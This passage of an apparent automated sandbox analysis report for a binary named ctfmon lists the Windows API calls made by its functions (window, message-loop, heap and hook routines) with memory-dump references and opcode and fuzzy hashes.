        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: DriveDrivesLogicalSleepType
        • String ID: +*&=^^^^--------DRIVE$I
        • API String ID: 998507393-3356893098
        • Opcode ID: 6404bc3285479118a6d9aa39b9ca3365bf84b49e5fd7b4dc3ec66ac132270eda
        • Instruction ID: 49d0c6ced368fd66185a0629946516c02ffbc5c9166c48d24d2764af2432aa93
        • Opcode Fuzzy Hash: 6404bc3285479118a6d9aa39b9ca3365bf84b49e5fd7b4dc3ec66ac132270eda
        • Instruction Fuzzy Hash: 1A015E325043049BE700DF60D85165BBFE2AB98710F80483EF95A7B3C0DA769E09DB9A
        APIs
        • GetWindowLongW.USER32(?,?), ref: 00421887
        • SetWindowLongW.USER32(?,?,00408812), ref: 004218A6
        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,?,?,004218FE,00408812,000000EC,?,?,?,00408812,?), ref: 004218C0
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$Long
        • String ID:
        • API String ID: 847901565-0
        • Opcode ID: 3ee0e841910f72ad038163963a675ad57a9dba422b27fd7ec58bc383047907e9
        • Instruction ID: 46a18c6c3a5692cf3f7d8173769a82117a3993c78e402f77b7694b3d22f29e20
        • Opcode Fuzzy Hash: 3ee0e841910f72ad038163963a675ad57a9dba422b27fd7ec58bc383047907e9
        • Instruction Fuzzy Hash: 48F01C35210019BFDF18AF50EC959BF3B65EF14351B90842AF906C5170D731A962AAA8
        APIs
        • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0042093F
        • TranslateMessage.USER32(?), ref: 0042095F
        • DispatchMessageW.USER32(?), ref: 00420966
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Message$CallbackDispatchDispatcherTranslateUser
        • String ID:
        • API String ID: 2960505505-0
        • Opcode ID: b3613d69d856413218d6d1271ffd960b09534bfebe9e9f37242a4a3cb32dcde9
        • Instruction ID: fabc7a01dc3d71df9f254138b74deb61d15ffc8e1f8f1f232a1b835c48f4a5e8
        • Opcode Fuzzy Hash: b3613d69d856413218d6d1271ffd960b09534bfebe9e9f37242a4a3cb32dcde9
        • Instruction Fuzzy Hash: F6E092723005106FE3316B28AC98E7F37ECEF85B01784042EF402D2112CB649C82CA7A
        APIs
          • Part of subcall function 00424202: GetWindowLongW.USER32(?,000000F0), ref: 0042420E
        • GetWindowRect.USER32(?,00421B1C), ref: 00421949
        • GetWindow.USER32(?,00000004), ref: 00421966
          • Part of subcall function 0042438F: IsWindowEnabled.USER32(?), ref: 00424399
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$EnabledLongRect
        • String ID:
        • API String ID: 3170195891-0
        • Opcode ID: effe7db21416aec86d5d1406498b371649853bace2238ba7ed55f32c8f800dca
        • Instruction ID: 3d44051e79cfe25b8d70dd5f5f519bbb07aa03c4fe1e1fb717501b8327a53114
        • Opcode Fuzzy Hash: effe7db21416aec86d5d1406498b371649853bace2238ba7ed55f32c8f800dca
        • Instruction Fuzzy Hash: 39015E707002289BDB21AB25E865B7E77A9AF61714F80486EED42973A1D738ED80C65C
        APIs
        • SetFilePointer.KERNEL32(00000000,0053CB6B,00000000,00000000,00000000,0053CB6B,004126A5,0053CB6B,00000000,00000002,00000001,0053CB6B,?), ref: 00412872
        • GetLastError.KERNEL32 ref: 0041287F
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ErrorFileLastPointer
        • String ID:
        • API String ID: 2976181284-0
        • Opcode ID: 2bd6f2df571c30d8d268d01624ed3f6f81c3a9a6c1b2a642c7a8942a74d1f768
        • Instruction ID: 10e19110f1e5badc9e720bb41e1b460c98416622eb2bcf91d42185f1d58b7cbf
        • Opcode Fuzzy Hash: 2bd6f2df571c30d8d268d01624ed3f6f81c3a9a6c1b2a642c7a8942a74d1f768
        • Instruction Fuzzy Hash: E0F02D3661421157CA247B78AC085DA37649F85334F21077BF531D72E1DF78C8A68359
        APIs
        • SetErrorMode.KERNEL32(00000000,00000000,0042603E,00000000,00000000,00000000,00000000,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000,0040D108), ref: 004291CF
        • SetErrorMode.KERNEL32(00000000,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000,0040D108,00000000), ref: 004291D6
          • Part of subcall function 00429229: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 0042925A
          • Part of subcall function 00429229: lstrcpyW.KERNEL32(?,.HLP,?,?,00000104), ref: 004292FB
          • Part of subcall function 00429229: lstrcatW.KERNEL32(?,.INI,?,?,00000104), ref: 0042932A
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
        • String ID:
        • API String ID: 3389432936-0
        • Opcode ID: f71a52bd6f10f1c5d171d46f7e8e0ad32366ecb0e776d89220ff6f7025bbea85
        • Instruction ID: 0f0f40c96ee9f28d0d0ec8962dd78e8fd03b51d7b4fb64733512bf25de8db611
        • Opcode Fuzzy Hash: f71a52bd6f10f1c5d171d46f7e8e0ad32366ecb0e776d89220ff6f7025bbea85
        • Instruction Fuzzy Hash: 1AF04975A142209FD714EF65E485A0D7BE4AF44B10F45888FF8489B3A2CF78D840CF6A
        APIs
        • HeapCreate.KERNEL32(00000000,00001000,00000000,0040D087,00000001), ref: 004103FC
          • Part of subcall function 004102A3: GetVersionExA.KERNEL32 ref: 004102C2
        • HeapDestroy.KERNEL32 ref: 0041043B
          • Part of subcall function 00412D44: HeapAlloc.KERNEL32(00000000,00000140,00410424,000003F8), ref: 00412D51
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Heap$AllocCreateDestroyVersion
        • String ID:
        • API String ID: 2507506473-0
        • Opcode ID: dc0e4f96b9bfa2dfd241da328ae4e49f447cbd5b13466095a185e15b9ddf63a4
        • Instruction ID: 497c8a25df3411b8ffde37235463325da3650acc20757d7ac2592f9ec469bdd4
        • Opcode Fuzzy Hash: dc0e4f96b9bfa2dfd241da328ae4e49f447cbd5b13466095a185e15b9ddf63a4
        • Instruction Fuzzy Hash: 00F06530B512119DDB645B70ED877FA2694DB9078EF24442BF684C91E1EBF884C5990A
        APIs
        • DefWindowProcW.USER32(?,?,?,?), ref: 00422487
        • CallWindowProcW.USER32(?,?,?,?,?), ref: 0042249C
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ProcWindow$Call
        • String ID:
        • API String ID: 2316559721-0
        • Opcode ID: f688ebd1a0ae5da7d78c7a24aa8a1e7d28b38987f708924316816e99806330b5
        • Instruction ID: 233a5364c896a44adc16a6cce7b45886d7cf299a5c9d453a734240230d2e1711
        • Opcode Fuzzy Hash: f688ebd1a0ae5da7d78c7a24aa8a1e7d28b38987f708924316816e99806330b5
        • Instruction Fuzzy Hash: 78F01C36200215FFCF219F95EC44D9A7BB9FF18360B448529FA4586120D772D920AB44
        APIs
          • Part of subcall function 00428C05: TlsGetValue.KERNEL32(00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000), ref: 00428C44
        • GetCurrentThreadId.KERNEL32 ref: 004220B8
        • SetWindowsHookExW.USER32(00000005,Function_00021EF2,00000000,00000000), ref: 004220C8
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CurrentHookThreadValueWindows
        • String ID:
        • API String ID: 933525246-0
        • Opcode ID: 2a60e45d90dbc51d8dff187ae436cece9d4aa2d7a8c02c67daea1e4041fd0ec8
        • Instruction ID: 17601e8b442b9b03c5e5566830a56eca268cea50e62353c77c62ba015712df01
        • Opcode Fuzzy Hash: 2a60e45d90dbc51d8dff187ae436cece9d4aa2d7a8c02c67daea1e4041fd0ec8
        • Instruction Fuzzy Hash: F5E0E531301720AFD2305B22AC05B1776E4EF80B11F90452FE205D1140D7B89846CB7D
        APIs
        • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 0040E231
          • Part of subcall function 0041257D: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125BA
          • Part of subcall function 0041257D: EnterCriticalSection.KERNEL32(?,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125D5
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalSection$AllocateEnterHeapInitialize
        • String ID:
        • API String ID: 1616793339-0
        • Opcode ID: c2eccd4ad7c7d846102367b4257caf7ecf94ba4f496759abc678b985d4644e17
        • Instruction ID: 9efc5791e0f1d7c9c186a67d883c5475a9d78367af9f374711ed2f43329d38d0
        • Opcode Fuzzy Hash: c2eccd4ad7c7d846102367b4257caf7ecf94ba4f496759abc678b985d4644e17
        • Instruction Fuzzy Hash: B9219A31A40215ABDB109BA6EC42BDE7768EB10724F14496FF410FB2D1C778A9918A98
        APIs
        • __EH_prolog.LIBCMT ref: 00421A79
          • Part of subcall function 00428C05: TlsGetValue.KERNEL32(00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000), ref: 00428C44
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: H_prologValue
        • String ID:
        • API String ID: 3700342317-0
        • Opcode ID: 08febc6eb8c8e99cee7acacc4cfd95ba39e2bfe778b2f071883e8455ad0c05b3
        • Instruction ID: 9dde40da2586159c776057cb4fc6e6fed61ba2f5afb010fcb97a0dbd75fd19cc
        • Opcode Fuzzy Hash: 08febc6eb8c8e99cee7acacc4cfd95ba39e2bfe778b2f071883e8455ad0c05b3
        • Instruction Fuzzy Hash: D8219872A00229EFCF01DF94D482AEE7BB9FF14354F40406AF905AB250D778AE51CBA4
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Parent
        • String ID:
        • API String ID: 975332729-0
        • Opcode ID: 096ca800010d018c2cbe0580766a8a0f22658b4df3f5255ea708dcb48673a043
        • Instruction ID: 550f0e8a84989d5d683be727cd5a6e25dc03dbd874991ceb634d077cd056d06a
        • Opcode Fuzzy Hash: 096ca800010d018c2cbe0580766a8a0f22658b4df3f5255ea708dcb48673a043
        • Instruction Fuzzy Hash: 8E01E5313403156F9F309E32EE45E7B7BE9EF85360B45061AFD01822D2D675DC119668
        APIs
        • GetCommandLineW.KERNEL32(76232F60), ref: 00405068
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CommandLine
        • String ID:
        • API String ID: 3253501508-0
        • Opcode ID: d6fc8d5f54c61530a5c77b9057443d1d89c53e4bab3cd9aef80dc24be2ccb722
        • Instruction ID: 5f64aa0511f199e587e2562682c13d905a4b2d41f00720daa4a58be541493b64
        • Opcode Fuzzy Hash: d6fc8d5f54c61530a5c77b9057443d1d89c53e4bab3cd9aef80dc24be2ccb722
        • Instruction Fuzzy Hash: 8701A5B1904750ABC210EB65DC41F5B77A8EB85B24F404A2EF055632C1DB7C9405C7AA
        APIs
        • KiUserCallbackDispatcher.NTDLL(00000000,00000000,00000000,?,?,?,0042229C,00000000,?,00423318,?,?,?,00000000), ref: 00422440
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CallbackDispatcherUser
        • String ID:
        • API String ID: 2492992576-0
        • Opcode ID: 81f7fa7795a58c9070dde423e946950128eaf9f2ba9c9b35d5eddbe908c3a4b3
        • Instruction ID: f2b3b73b2fa0f690a60d1bef5b73732d0ba4f5705fb81792612d96087fc2e6ef
        • Opcode Fuzzy Hash: 81f7fa7795a58c9070dde423e946950128eaf9f2ba9c9b35d5eddbe908c3a4b3
        • Instruction Fuzzy Hash: DBF0E230304A209FDB247B26F954B2B73F0AFA0319B81416FF00287230DAA4DC068A58
        APIs
        • LoadIconW.USER32(?,00000080), ref: 0040120A
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: IconLoad
        • String ID:
        • API String ID: 2457776203-0
        • Opcode ID: 783db8339120b3803db67abad11e484fa13dc9abfd5022a1b4a4c924fe9f323f
        • Instruction ID: e74f766c04b7c49422ceb5cf71cffa2e33917004825e20756c12fd70ddaf5a09
        • Opcode Fuzzy Hash: 783db8339120b3803db67abad11e484fa13dc9abfd5022a1b4a4c924fe9f323f
        • Instruction Fuzzy Hash: BCF05EB1644760AFD310EF59D941B1AB7E8FB44B60F408A1EF554D7780CBBD9404CBAA
        APIs
        • IsDialogMessageW.USER32(?,?), ref: 004241F8
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: DialogMessage
        • String ID:
        • API String ID: 547518314-0
        • Opcode ID: 7f37717f5a0d1cad6fab656fae9d0e17bc25d5d1066a596d500859a9c5798ecc
        • Instruction ID: 40e96fc83cf72e62bc38d0dd10c762a652443d51e327850f1d3c9034ecc6bd13
        • Opcode Fuzzy Hash: 7f37717f5a0d1cad6fab656fae9d0e17bc25d5d1066a596d500859a9c5798ecc
        • Instruction Fuzzy Hash: 9BE08631204721AFC3119B14D40CA9A7BE5AF89300B0145A9F44982221C77598D2CB59
        APIs
        • LoadStringW.USER32(?,?,?,?), ref: 00424B50
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: LoadString
        • String ID:
        • API String ID: 2948472770-0
        • Opcode ID: 695f98c75e655a4ebf45e9277a1d54146fe03b87f83f651db76b8e19ecb3f902
        • Instruction ID: a506e4222beda04e1588787adb9b7428afadcb601b5091b2f91342631f0270ef
        • Opcode Fuzzy Hash: 695f98c75e655a4ebf45e9277a1d54146fe03b87f83f651db76b8e19ecb3f902
        • Instruction Fuzzy Hash: 92D0A976208362EBCB60DF60A848E4FBBE8FF943A0B014C0EF89083210C324E841CB65
        APIs
        • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00423DBD
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: MessagePost
        • String ID:
        • API String ID: 410705778-0
        • Opcode ID: 32e5277c3e9543733455b8c3b8d221857b9964b7cb34c309716bbb70ce16518a
        • Instruction ID: c85c3ea2753426f305096725929343eb9ef3bb4cd67ff242f83a7ca43b6db1df
        • Opcode Fuzzy Hash: 32e5277c3e9543733455b8c3b8d221857b9964b7cb34c309716bbb70ce16518a
        • Instruction Fuzzy Hash: D2D092F1620200AFA750DF28D944D363BE9EF18708760896AE848CA252E336DC23DB18
        APIs
        • ShowWindow.USER32(?,?,00409949,00000000,?,?,?,?,00000000), ref: 00424376
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ShowWindow
        • String ID:
        • API String ID: 1268545403-0
